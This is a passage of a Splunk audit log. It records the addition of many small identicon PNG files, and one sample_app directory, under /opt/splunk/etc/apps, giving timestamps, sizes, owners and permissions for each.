18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.587, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.583, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/999.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.579, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/998.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.575, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/997.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.571, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/996.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.567, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/995.png", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.562, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/994.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.558, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/993.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.555, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/992.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.550, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/991.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.546, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/990.png", isdir=0, size=257, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.542, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/99.png", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.538, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/989.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.534, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/988.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.529, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/987.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.524, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/986.png", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.518, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/985.png", isdir=0, size=301, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.514, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/984.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.509, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/983.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.504, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/982.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.499, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/981.png", isdir=0, size=320, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.495, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/980.png", isdir=0, size=337, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.490, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/98.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.485, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/979.png", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.480, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/978.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.476, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/977.png", isdir=0, size=392, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.473, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/976.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.468, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/975.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.464, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/974.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.460, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/973.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.456, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/972.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.451, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/971.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.446, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/970.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.443, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/97.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.439, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/969.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.435, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/968.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.431, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/967.png", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.427, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/966.png", isdir=0, size=323, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.422, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/965.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.417, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/964.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.414, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/963.png", isdir=0, size=328, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.409, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/962.png", isdir=0, size=328, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.405, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/961.png", isdir=0, size=389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.401, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/960.png", isdir=0, size=408, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.395, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/96.png", isdir=0, size=331, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.391, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/959.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.387, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/958.png", isdir=0, size=285, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.382, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/957.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.379, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/956.png", isdir=0, size=389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.374, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/955.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.371, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/954.png", isdir=0, size=332, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.367, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/953.png", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.363, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/952.png", isdir=0, size=295, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.360, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/951.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.356, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/950.png", isdir=0, size=290, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.352, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/95.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.348, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/949.png", isdir=0, size=330, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.343, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/948.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.340, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/947.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.336, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/946.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.333, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/945.png", isdir=0, size=351, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.330, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/944.png", isdir=0, size=402, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.325, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/943.png", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.322, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/942.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.318, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/941.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.315, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/940.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.311, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/94.png", isdir=0, size=334, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.307, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/939.png", isdir=0, size=395, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.303, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/938.png", isdir=0, size=303, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.299, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/937.png", isdir=0, size=395, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.296, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/936.png", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.292, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/935.png", isdir=0, size=324, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.288, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/934.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.285, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/933.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.281, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/932.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.278, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/931.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.274, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/930.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.269, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/93.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.265, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/929.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.261, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/928.png", isdir=0, size=274, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.256, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/927.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.252, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/926.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.243, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/925.png", isdir=0, size=289, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.238, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/924.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.234, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/923.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.229, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/922.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.222, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/921.png", isdir=0, size=270, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.217, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/920.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.212, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/92.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.209, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/919.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.204, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/918.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.200, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/917.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.196, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/916.png", isdir=0, size=317, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.191, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/915.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.188, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/914.png", isdir=0, size=393, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.184, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/913.png", isdir=0, size=312, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.180, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/912.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.177, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/911.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.173, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/910.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.169, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/91.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.165, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/909.png", isdir=0, size=395, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.161, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/908.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.157, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/907.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.153, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/906.png", isdir=0, size=320, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.150, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/905.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.146, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/904.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.142, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/903.png", isdir=0, size=328, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.139, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/902.png", isdir=0, size=242, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.136, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/901.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.132, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/900.png", isdir=0, size=305, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.128, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/90.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.124, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/9.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.120, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/899.png", isdir=0, size=275, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.117, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/898.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.113, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/897.png", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.109, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/896.png", isdir=0, size=314, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.105, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/895.png", isdir=0, size=392, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.101, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/894.png", isdir=0, size=291, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.096, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/893.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.092, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/892.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.088, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/891.png", isdir=0, size=404, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.084, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/890.png", isdir=0, size=283, gid=41812, uid=41812, 